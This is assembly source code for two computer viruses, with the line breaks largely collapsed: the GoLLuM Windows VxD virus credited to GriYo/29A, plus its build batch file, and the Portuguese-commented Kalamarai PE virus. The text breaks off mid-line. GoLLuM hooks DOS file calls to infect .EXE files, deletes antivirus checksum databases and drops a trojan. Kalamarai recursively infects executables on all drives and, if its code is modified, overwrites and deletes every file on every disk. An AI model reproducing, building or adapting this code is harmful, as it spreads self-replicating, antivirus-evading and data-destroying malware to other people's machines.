.386p;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Includes ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

.XLISTINCLUDE Vmm.IncINCLUDE SheLL.Inc.LIST

;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Virtual device declaration ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Declare_Virtual_Device WGoLLuM,03h,00h,WGoLLuM_Control,Undefined_Device_ID,,,

;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Initialization data segment ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

VxD_IDATA_SEG

VxD_Installation_Title db "GoLLuM ViRuS by GriYo/29A",00hVxD_Installation_Msg db "Deep down here by the dark water lived old "

db "Gollum, a small slimy creature. I dont know "

db "where he came from, nor who or what he was. "db "He was a Gollum -as dark as darkness, except "db "for two big round pale eyes in his thin face."db 0Dh,0Ah,0Dh,0Ahdb "J.R.R. ToLkieN ... The HoBBit"db 0Dh,0Ah,0Dh,0Ahdb 00h

VxD_IDATA_ENDS

;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Local locked data segment ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

VxD_LOCKED_DATA_SEG

Header_Size equ 001Ch ;Dos .EXE header sizeVxD_Size equ 6592 ;VxD file size

ALIGN DWORDDOS_Virus_Code equ this byte ;Start of Dos virus code

include gollum.inc ;Load Dos virus codeHeader_Copy db Header_Size dup (00h) ;Buffer for old .EXE headerDOS_Virus_End equ this byteDOS_Virus_Size equ (DOS_Virus_End-DOS_Virus_Code)Our_Own_Call_Flag db "EERF" ;Dos call from virus?File_Size dd 00000000h ;Size of file to infectStart_FileName dd 00000000h ;Filename startVxD_Buffer db 0200h dup (00h) ;VxD file copyInfect_FileName db 80h dup (00h) ;Last executed fileFile_Header db Header_Size dup (00h) ;Infected .EXE headerVxD_File_Name db 80h dup (00h) ;Path of virus VxDGollum_Name db "GOLLUM.386",00h ;Name of virus VxD fileTrojan_File_Name db "GOLLUM.EXE",00h ;Generated trojansCheckSum_File_00: db "ANTI-VIR.DAT",00h ;Names of av databasesCheckSum_File_01: db "CHKLIST.TAV",00hCheckSum_File_02: db "CHKLIST.MS",00hCheckSum_File_03: db "AVP.CRC",00hCheckSum_File_04: db "IVB.NTZ",00hGollum_Handle dw 0000h ;VxD file handleVictim_Handle dw 0000h ;Victim file handleFile_Attr dw 0000h ;Victim file attrFile_Time dw 0000h ;Victim file timeFile_Date dw 0000h ;Victim file date

VxD_LOCKED_DATA_ENDS

;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Initialization code segment ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

VxD_ICODE_SEG

;This is the virus startup code (Sys_Critical_Init);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

BeginProc WGoLLuM_Sys_Critical_Init

;Get path of WIN386.EXEVMMCall Get_Exec_Path;Copy path to our buffermov esi,edxmov edi,OFFSET32 VxD_File_Namecldrep movsbmov esi,OFFSET32 Gollum_Namemov ecx,0Bhcldrep movsb;Return, Sys_Critical_Init completeclcret

EndProc WGoLLuM_Sys_Critical_Init

;This is the virus startup code (Device_Init);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

BeginProc WGoLLuM_Device_Init

;Hook int 21h so we can monitor dos file operationsmov eax,21hmov esi,OFFSET32 VxD_Int_21hVMMcall Hook_V86_Int_Chainclcret

EndProc WGoLLuM_Device_Init

;This is the virus startup code (Init_Complete);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

BeginProc WGoLLuM_Init_Complete

;Check current datemov ah,04hVxDint 1Ahcmp dx,0604h

jne short Not_Yet;Display instalation msgVMMCall Get_SYS_VM_Handlexor eax,eax

mov ecx,OFFSET32 VxD_Installation_Msgmov edi,OFFSET32 VxD_Installation_TitleVxDcall Shell_SYSMODAL_Message

Not_Yet:;Return, Sys_Critical_Init completeclcret

EndProc WGoLLuM_Init_Complete

VxD_ICODE_ENDS

;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿;³Locked code segment ³;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

VxD_LOCKED_CODE_SEG

;This is a call-back routine to handle the messages that are sent;to VxD's to control system operation;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

BeginProc WGoLLuM_Control

Control_Dispatch Sys_Critical_Init, WGoLLuM_Sys_Critical_Init Control_Dispatch Device_Init, WGoLLuM_Device_Init Control_Dispatch Init_Complete, WGoLLuM_Init_Complete

clcret

EndProc WGoLLuM_Control

;This is the virus int 21h handler;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

BeginProc VxD_Int_21h, High_Freq

;Save regspushad;Check for our own calls (avoid recursive int 21h calls)cmp dword ptr [Our_Own_Call_Flag],"BUSY"

je short Exit_VxD_Int_21h;Set flagmov dword ptr [Our_Own_Call_Flag],"BUSY";Get called functionmov ax,word ptr [ebp.Client_AX] ;Check for Exec function callscmp ax,4B00h

je short Store_FileName;Check for Terminate with error-code 00h function callscmp ax,4C00h

je short Infect_Stored_FileNamecmp ah,3Bhje Drop_Exe_Trojan

Exit_VxD_Int_21h:;Clear flagmov dword ptr [Our_Own_Call_Flag],"FREE";Restore regspopad;Int not served yetstcret

;Save file name for later infection;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Store_FileName: ;Save filename into our buffermovzx edx,word ptr [ebp.Client_DX]movzx eax,word ptr [ebp.Client_DS]shl eax,04hadd eax,edxmov esi,eaxmov edi,OFFSET32 Infect_FileName

Go_Thru_Filename:cldlodsbstosbor al,aljnz Go_Thru_Filenamejmp Exit_VxD_Int_21h

;Infect stored file name;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Infect_Stored_FileName:;Check if working on C: drivemov esi,OFFSET32 Infect_FileNamecmp word ptr [esi],":C"jne Infect_Error

Look_End: ;Find null marker into filename

cldlodsbor al,aljnz Look_End

Found_Tail:;Search begin of file namedec esimov ecx,0080h

Look_Start:std

lodsb;Do not infect files with V character in their namescmp al,"V"je Infect_Error;Do not infect files with digit in their namescmp al,"0"

jb short Check_Startcmp al,"9"jbe Infect_Error

Check_Start:cmp al,"\"

je short Check_Namesloop Look_Start;Begin of file name not found, tchhh...jmp Infect_Error

Check_Names:inc esiinc esi;Save pointer to file name startmov dword ptr [Start_FileName],esicldlodsd

;Check for SCANcmp eax,"NACS"je Infect_Error;Check for F-PROTcmp eax,"RP-F"je Infect_Error ;Avoid THUNDERBYTE shitcmp ax,"BT"je Infect_Error ;Get file attrmov ax,4300hmov edx,OFFSET32 Infect_FileNameVxDint 21hjc Infect_Error;Save file attrmov word ptr [file_attr],cx;Wipe out attrmov ax,4301hxor cx,cxVxDint 21hjc Infect_Error;Open file to infectmov ax,3D02hmov edx,OFFSET32 Infect_FileNameVxDint 21hjc Restore_Attr;Get file handlermov word ptr [Victim_Handle],axxchg bx,ax

;Get file date/timemov ax,5700hVxDint 21hjc Infect_Close;Save file date timemov word ptr [File_Time],cxmov word ptr [File_Date],dx;Read file headermov ah,3Fhmov ecx,Header_Sizemov edx,OFFSET32 File_HeaderVxDint 21h jc Restore_Date_Time;Seek to EOF and get real file sizecall Seek_File_Endjc Restore_Date_Time;Do not infect too small filescmp eax,DOS_Virus_Size+VxD_Sizejbe Restore_Date_Time

Test_EXE_File: ;Point esi to file headermov esi,OFFSET32 File_Header;Check dos .EXE file type markcmp word ptr [esi],"ZM"jne Restore_Date_Time;Check if file is infectedcmp word ptr [esi+12h],"CR"je Restore_Date_Time;Don't infect Windows files or abovecmp word ptr [esi+19h],0040hjae Restore_Date_Time;Don't infect overlayscmp word ptr [esi+1Ah],0000hjne Restore_Date_Time;Check maxmem fieldcmp word ptr [esi+0Ch],0FFFFhjne Restore_Date_Time;Save entry pointpush eaxmov eax,dword ptr [esi+14h];Crypt it!not eaxmov dword ptr [DOS_Virus_Code+0177h],eaxpop eax;Make a copy of .exe file headerpush esimov edi,OFFSET32 Header_Copy mov ecx,Header_Size

Copy_Loop: cldlodsb

not alstosbloop Copy_Looppop esi;Get file size into dx:axmov eax,dword ptr [File_Size]mov edx,eaxshr edx,10h;Get file size div 10hmov cx,0010hdiv cx;Sub header sizesub ax,word ptr [esi+08h];New entry point at EOFmov word ptr [esi+14h],dxmov word ptr [esi+16h],ax;Save delta offsetmov word ptr [DOS_Virus_Code+0001h],dx;Set new offset of stack segment in load moduleinc axmov word ptr [esi+0Eh],ax;Set new stack pointer beyond end of virusadd dx,DOS_Virus_Size+VxD_Size+0200h;Aligmentand dx,0FFFEhmov word ptr [esi+10h],dx;Get file size into dx:axmov eax,dword ptr [File_Size]mov edx,eaxshr edx,10h;Get file size div 0200hmov cx,0200hdiv cxor dx,dx

jz short Size_Round_1inc ax

Size_Round_1:;Check if file size is as header sayscmp ax,word ptr [esi+04h]jne Restore_Date_Timecmp dx,word ptr [esi+02h]jne Restore_Date_Time;Get file size into dx:axmov eax,dword ptr [File_Size]mov edx,eaxshr edx,10h;Add virus size to file sizeadd ax,DOS_Virus_Size+VxD_Sizeadc dx,0000h;Get infected file size div 0200hmov cx,0200h

div cxor dx,dx

jz short Size_Round_2inc ax

Size_Round_2:;Store new sizemov word ptr [esi+02h],dxmov word ptr [esi+04h],ax;Write DOS virus area next to EOFmov ah,40hmov ecx,DOS_Virus_Sizemov edx,OFFSET32 DOS_Virus_CodeVxDint 21h jc Restore_Date_Time;Open Gollum VxD filemov ax,3D00hmov edx,OFFSET32 VxD_File_NameVxDint 21hjc Restore_Date_Time;Save file handlermov word ptr [Gollum_Handle],ax

Read_VxD_Block:;Read VxD file blockmov ah,3Fhmov bx,word ptr [Gollum_Handle]mov ecx,0200hmov edx,OFFSET32 VxD_BufferVxDint 21hpush eax;Encrypt blockmov esi,edxmov edi,edxmov cx,0200h

Crypt_Loop_3:cldlodsbnot alstosbloop Crypt_Loop_3;Write block pop ecxmov ah,40hmov bx,word ptr [Victim_Handle]VxDint 21h cmp cx,0200hje Read_VxD_Block;Close filemov bx,word ptr [Gollum_Handle]mov ah,3EhVxDint 21h;Seek to beginning of file

mov bx,word ptr [Victim_Handle]call Seek_File_Start;Mark file as infectedmov esi,OFFSET32 File_Headermov word ptr [esi+12h],"CR";Write new headermov ah,40hmov cx,Header_Sizemov edx,esiVxDint 21h;Delete ANTI-VIR.DATmov esi,OFFSET32 CheckSum_File_00call Delete_File;Delete CHKLIST.TAVmov esi,OFFSET32 CheckSum_File_01call Delete_File;Delete CHKLIST.MSmov esi,OFFSET32 CheckSum_File_02call Delete_File;Delete AVP.CRCmov esi,OFFSET32 CheckSum_File_03call Delete_File;Delete IVB.NTZmov esi,OFFSET32 CheckSum_File_04call Delete_File

Restore_Date_Time:mov ax,5701hmov cx,word ptr [File_Time]mov dx,word ptr [File_Date]VxDint 21h

Infect_Close: ;Close filemov ah,3EhVxDint 21h

Restore_Attr:;Restore file attrmov ax,4301hmov cx,word ptr [File_Attr]mov edx,OFFSET32 Infect_FileNameVxDint 21h

Infect_Error:jmp Exit_VxD_Int_21h

;Drop a trojan .EXE file (sometimes);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄDrop_Exe_Trojan: ;This is our dice

in ax,40hcmp al,0FFhjne Bad_OverWrite;Open Gollum VxD file

mov ax,3D00hmov edx,OFFSET32 VxD_File_NameVxDint 21hjc Bad_OverWrite;Save file handlermov word ptr [Gollum_Handle],ax;Create file, abort if existmov ah,5Bhxor cx,cxmov edx,OFFSET32 Trojan_File_NameVxDint 21h

jc short Bad_OverOpen;Save file handlermov word ptr [Victim_Handle],ax

Trojanize_Block:;Read VxD file blockmov ah,3Fhmov bx,word ptr [Gollum_Handle]mov ecx,0200hmov edx,OFFSET32 VxD_BufferVxDint 21h;Write block xchg ecx,eaxmov ah,40hmov bx,word ptr [Victim_Handle]VxDint 21h cmp cx,0200hje Trojanize_Block;Close trojan filemov ah,3EhVxDint 21h

Bad_OverOpen:;Close virus VxD filemov bx,word ptr [Gollum_Handle]mov ah,3EhVxDint 21h

Bad_OverWrite:jmp Exit_VxD_Int_21h

;Delete file routines;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Delete_File:mov edi,dword ptr [Start_FileName]

Copy_DB_Name:cldlodsbstosbor al,aljnz Copy_DB_Name;Wipe out file attr

mov ax,4301hxor ecx,ecxmov edx,OFFSET32 Infect_FileNameVxDint 21h;Delete filenamemov ah,41hVxDint 21hret

;Move file pointer routines (bx = file handle);ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Seek_File_Start:xor al,aljmp SHORT Seek_Int_21h

Seek_File_End: mov al,02h

Seek_Int_21h:mov ah,42hxor cx,cxxor dx,dxVxDint 21h

jc short Seek_Error;Return file pointer position into eaxand eax,0000FFFFhshl edx,10hadd eax,edxmov dword ptr [File_Size],eaxclcret

Seek_Error:stcret

EndProc VxD_Int_21h

VxD_LOCKED_CODE_ENDS

END

; - -[ASSEMBLE.BAT - Batch file used to build GOLLUM.INC] - - - - - - - ->8

tasm gollumtlink /Tde gollumexe2bin gollum.exe gollum.bincryptdata gollum.crp gollum.inc

;Kalamarai virus - Um caso cl ssico de personalidade dupla ;)

;Este virus pode corrigir at‚ 90 bytes linearmente modificados a cada ciclo,;usando uma rotina de ECC Reed-Solomon, portanto, tentativas de modificar o;codigo residente sÆo futeis, e perigosas, pois se o virus nÆo consegue;corrigir todas as modifica‡äes(mais de 90 bytes), deleta todos os arquivos;de todos os discos. O virus ‚ encriptado usando MUL/DIV, obtem as APIs;diretamente da ImportTable do hospedeiro, e cria uma thread paralela para se;executar. O virus busca recursivamente todos os discos por arquivos PE de;extensÆo EXE e SCR.

;Aten‡Æo: NÆo modifique! O c¢digo sempre deve ser multiplo de 249!

.386p

.model flat

RELOCS EQU 094h

ofs equ offsetby equ byte ptrwo equ word ptrdwo equ dword ptr

.xlistinclude pe.incinclude mz.incinclude win32api.incinclude useful.inc.list

.data

v_ini: mov esi, ? vofs equ dwo $-4 add esi, [esp+4] ;parƒmetro da thread=reloc mov edi, esi mov ecx, (ofs v_fim-ofs entrada)/4 mov ebx, ? chave equ dwo $-4 desencripta: sub edx, edx lodsd mul ebx add eax, [esi] stosd ;dword1*key+dword2 lodsd loop desencripta entrada: cld ;entrada da primeira gera‡Æo

call delta delta: pop ebp lea esi, [ebp+(ofs reloctable-ofs delta)] mov edi, ebp sub edi, (ofs delta-ofs v_ini) ;edi=inicio do virus sub ebp, ofs delta mov ecx, ? ;ebp=diferen‡a do offset original numeroreloc equ $-4 arruma: sub eax, eax lodsw not ax ;encripta‡Æo leve add [edi+eax], ebp ;arruma ponteiro loop arruma mov eax, ? GMHA equ dwo $-4 ;ponteiro para a ImportTable add eax, [esp+4] push ofs kernel32 call [eax] mov ebp, eax ;ebp=kernel32 module handle mov ebx, ? GPA equ dwo $-4 ;ponteiro para a ImportTable add ebx, [esp+4] mov esi, ofs kernel32API mov edi, ofs CreateThread_ proximaAPI: cmp by [esi], 0 ;todas as APIs obtidas? je feito push esi push ebp call [ebx] ;pega endere‡o stosd @endsz ;busca inicio da proxima API jmp proximaAPI feito: call dwo [GetTickCount] xor [chave], eax ;escolhe chave de encripta‡Æo or dwo [chave], 00000000001000001010101000000001b and dwo [chave], 00000000001111111111111111111111b push eax push ofs corrige ;rotina para evitar modifica‡äes call cria_thread mov eax, [thread_id] mov [thread_corrige], eax di_novo: push ofs infecta_pe ;rotina para chamar a cada arquivo push ofs busca_recursiva call cria_thread push 60*60*1000 call dwo [Sleep2] ;dorme por 1 hora

jmp di_novo

cria_tabela: call calcula_crc mov [crc32], eax ;salva not(crc32) do virus mov ebp, [tabela] sub ecx, ecx constroi: ;ecx=parƒmetro call constroi_bloco ;esi=6 bytes de CCE imul eax, ecx, 6 lea edi, [ebp+eax] ;posi‡Æo no buffer movsd movsw ;salva codigo para este bloco inc cl cmp cl, BLOCOS ;proximo bloco jne constroi ret

fode_tudo: pushad sub esi, esi mov ebp, [esp+(8*4)+4] push FILE_ATTRIBUTE_NORMAL push ebp call dwo [SetFileAttributesA] ;remove atributos do arquivo test eax, eax jz deleta_igual push esi push FILE_ATTRIBUTE_NORMAL push TRUNCATE_EXISTING push esi push esi push GENERIC_WRITE push ebp call dwo [CreateFileA] ;sobreescreve arquivo inc eax jz deleta_igual dec eax push eax ;argumento para fechar push esi push ofs temp push ofs fim_mensagem-ofs mensagem push ofs mensagem push eax ;escreve nossa mensagem call dwo [WriteFile] call dwo [CloseHandle] ;fecha arquivo deleta_igual: push ebp call dwo [DeleteFileA] ;detona arquivo nao_e: popad

ret 4

mensagem db "never touch the kala-marai!", 0fim_mensagem equ $

infecta_pe: pushad mov esi, [esp+(8*4)+4] push esi call dwo [lstrlen] mov eax, dwo [esi+eax-4] and eax, not 20202000h cmp eax, "EXE." ;extensÆo ‚ valida pra infe‡Æo? je detona cmp eax, "RCS." jne nao_e detona: push esi call infecta_arquivo ;manda bala! jmp nao_e

para_correcao: pushad segura: mov ecx, [espera] ;nÆo podemos mexer em nada... jecxz segura push dwo [thread_corrige] call dwo [SuspendThread] ;segura thread que corrige mov ecx, [esp+(8*4)] cmp by [ecx], 0cch je mexeu_pagou ;breakpoint esperando? volta: popad ret

segue_correcao: pushad call cria_tabela push dwo [thread_corrige] ;continua thread de corre‡Æo call dwo [ResumeThread] jmp volta ;temos que economizar bytes...

corrige: pushad mov dwo [espera], 1BLOCOS = (ofs final_virus-ofs v_ini)/249 push PAGE_READWRITE push MEM_RESERVE+MEM_COMMIT push (BLOCOS*6)+249+256 push 0 call dwo [VirtualAlloc]

mov [tabela], eax test eax, eax ;nÆo h memoria suficiente... jz deu_merda call cria_tabela ;cria corre‡Æo e crc32 verifica_virus: call calcula_crc xor eax, [crc32] jz verifica_virus ;virus foi modificado? dec dwo [espera] ;corrigindo virus, p ra tudo sub ecx, ecx proximo_bloco: call constroi_bloco ;esi=6 bytes de CCE imul eax, ecx, 6 lea edi, [ebp+eax] ;posi‡Æo no buffer cmpsd lahf cmpsw ;compara codigo para este bloco jne e_este sahf e_este: je bloco_ok ;bloco foi modificado? sub esi, 6 mov eax, [edi-6] mov [esi], eax mov ax, [edi-2] mov [esi+4], ax lea edi, [ebp+(BLOCOS*6)] ;edi=buffer temporario push ecx push ofs temp push edi push esi call _rsdecode ;corrige add esp, 3*4 pop ecx cmp dwo [temp], 3 ja mexeu_pagou ;corrigiu todos os erros? sub edx, edx corrige_byte: imul eax, edx, BLOCOS mov bl, [edi+edx] mov [eax+ecx+ofs v_ini], bl ;corrige byte inc dl cmp dl, 250 jne corrige_byte bloco_ok: inc cl cmp cl, BLOCOS ;proximo bloco jne proximo_bloco inc dwo [espera] ;tudo volta ao normal... jmp verifica_virus mexeu_pagou:

push ofs fode_tudo push ofs busca_recursiva call cria_thread ;ativa o virus! push MEM_RELEASE push 0 push ebp call dwo [VirtualFree] ;libera memoria deu_merda: popad ret 4

busca_recursiva: ;parƒmetro=rotina de arquivo pushad sub esp, 4 mov ebp, esp mov [ebp], "\:@" ;inicia busca por A:\ proximo_disco: cmp by [ebp], "Z" je tudo ;se j tamos no Z:\, para inc by [ebp] push ebp call dwo [GetDriveTypeA] cmp al, 3 ;‚ disco rigido? je fixo cmp al, 4 ;ou disco de rede? jne proximo_disco fixo: push ebp call dwo [SetCurrentDirectoryA] test eax, eax jz proximo_disco push dwo [esp+(8*4)+8] ;rotina CALLBACK call busca_disco ;busca dentro dos diret¢rios jmp proximo_disco tudo: add esp, 4 ;todos os discos processados jmp deu_merda

busca_disco: pushad sub esp, SIZEOF_WIN32_FIND_DATA+4+4+4 mov ebp, esp mov dwo [ebp.SIZEOF_WIN32_FIND_DATA], "*.*" ;constroi m scara de busca mov dwo [ebp.SIZEOF_WIN32_FIND_DATA+4+4], ".." ;e para mudar de diret¢rio lea eax, [ebp.SIZEOF_WIN32_FIND_DATA] push ebp push eax call dwo [FindFirstFileA] mov dwo [ebp.SIZEOF_WIN32_FIND_DATA+4], eax ;salva handle da busca inc eax jz sobe_dir

verifica_dir: lea eax, [ebp.WFD_szFileName] test dwo [ebp.WFD_dwFileAttributes], 10h jnz e_dir push eax mov eax, [esp+(8*4)+(SIZEOF_WIN32_FIND_DATA+4+4+4)+8] call eax ;chama CALLBACK continua_busca: push ebp push dwo [ebp.SIZEOF_WIN32_FIND_DATA+4] call dwo [FindNextFileA] ;procura proximo arquivo test eax, eax jnz verifica_dir sobe_dir: push dwo [ebp.SIZEOF_WIN32_FIND_DATA+4] call dwo [FindClose] lea eax, [ebp.SIZEOF_WIN32_FIND_DATA+4+4] ;ponteiro para ".." push eax call dwo [SetCurrentDirectoryA] add esp, SIZEOF_WIN32_FIND_DATA+4+4+4 jmp deu_merda e_dir: cmp by [eax], '.' je continua_busca ;evita travar push eax call dwo [SetCurrentDirectoryA] ;entra no diret¢rio test eax, eax jz continua_busca push dwo [esp+(8*4)+(SIZEOF_WIN32_FIND_DATA+4+4+4)+4] call busca_disco ;busca recursiva jmp continua_busca

cria_thread: push ofs temp push 4 ;CREATE_SUSPENDED push dwo [esp+(2*4)+8] ;parƒmetro push dwo [esp+(3*4)+4] ;rotina push 0 push 0 call dwo [CreateThread_] xchg ecx, eax jecxz deu_pau mov [thread_id], ecx push ecx push -15 ;THREAD_PRIORITY_IDLE push ecx call dwo [SetThreadPriority] call dwo [ResumeThread] deu_pau: ret 4*2

.xlistinclude ECC\rslib.asminclude ECC\gflib.asm.list

calcula_crc: mov edx, ofs v_ini mov ecx, ofs crc32-ofs v_ini push not 0 pop eax @@1: xor al, [edx] ;rotina de zhengxi inc edx mov bl, 8 @@2: shr eax, 1 jnc @@3 xor eax, 0EDB88320h ;polinomio @@3: dec bl jnz @@2 loop @@1 @@4: ;devolve not(crc32) ret

loader: pushad sub eax, 12345678h entrypoint equ dwo $-4 ;eax!=0 se arquivo foi relocado mov ebx, ? host_createthread equ dwo $-4 ;endere‡o de CreateThread na ImportTable mov ecx, ? ;entrada do desencriptador virus_pointer equ dwo $-4 add ebx, eax add ecx, eax push esp push esp push 0 push eax push ecx push 0 push 0 call [ebx] ;chama CreateThread pop eax popad db 0e9h ;continua execu‡Æo no host endereco_host dd 0fim_loader equ $

constroi_bloco: push ecx ;salva contador de blocos

sub edx, edx lea edi, [ebp+(BLOCOS*6)] ;edi=buffer temporario proximo_byte: imul eax, edx, BLOCOS mov al, [eax+ecx+ofs v_ini] stosb inc dl cmp dl, 250 jne proximo_byte ;constroi bloco de 249 bytes mov esi, edi sub edi, 250 push esi push edi call _rsencode ;calcula c¢digo de corre‡Æo de erro add esp, 4*2 pop ecx ret

LOCAL_DATA EQU SIZE IMAGE_NT_HEADERS+4+(8*3)+(IMAGE_SIZEOF_SECTION_HEADER*10)

infecta_arquivo: pushad sub esp, LOCAL_DATA mov ebp, esp push dwo [esp+(8*4)+4+LOCAL_DATA] call dwo [GetFileAttributesA] mov [ebp+SIZE IMAGE_NT_HEADERS], eax ;salva atributos do arquivo inc eax jz puta_merda push FILE_ATTRIBUTE_NORMAL push dwo [esp+(8*4)+4+LOCAL_DATA+4] call dwo [SetFileAttributesA] ;limpa atributos test eax, eax jz puta_merda push dwo [esp+(8*4)+4+LOCAL_DATA] call verifica inc eax jz ja_infectado push ebx ;parƒmetro para CloseHandle lea esi, [ebp+SIZE IMAGE_NT_HEADERS+4] push esi lodsd lodsd ;esi+=8 push esi lodsd lodsd ;esi+=8 push esi push ebx call dwo [GetFileTime] ;salva FILETIME sub esi, esi mov dwo [infectou?], esi

test eax, eax jz puta_que_pariu push esi push ofs temp push SIZE IMAGE_NT_HEADERS push ebp push ebx call dwo [ReadFile] ;lˆ PE header test eax, eax jz fudeu xor [temp], SIZE IMAGE_NT_HEADERS jnz fudeu cmp [ebp.NT_Signature], IMAGE_NT_SIGNATURE jne fudeu ;‚ PE de veras? mov ecx, dwo [ebp.NT_FileHeader.FH_Machine] cmp cx, IMAGE_FILE_MACHINE_I386 jne fudeu ;roda em Intel 386+ shr ecx, 16 cmp cl, 9 ;arquivo tem se‡äes demais... jae fudeu mov ax, [ebp.NT_FileHeader.FH_Characteristics] not al test ax, IMAGE_FILE_EXECUTABLE_IMAGE+IMAGE_FILE_DLL jnz fudeu ;nÆo ‚ DLL mas ‚ executavel mov eax, ecx shl eax, 5 ;eax*=32 shl ecx, 3 ;ecx*=8 add ecx, eax ;ecx=eax*40 mov [tsecao], ecx ;salva tamanho das SectionHeaders lea esi, [ebp+SIZE 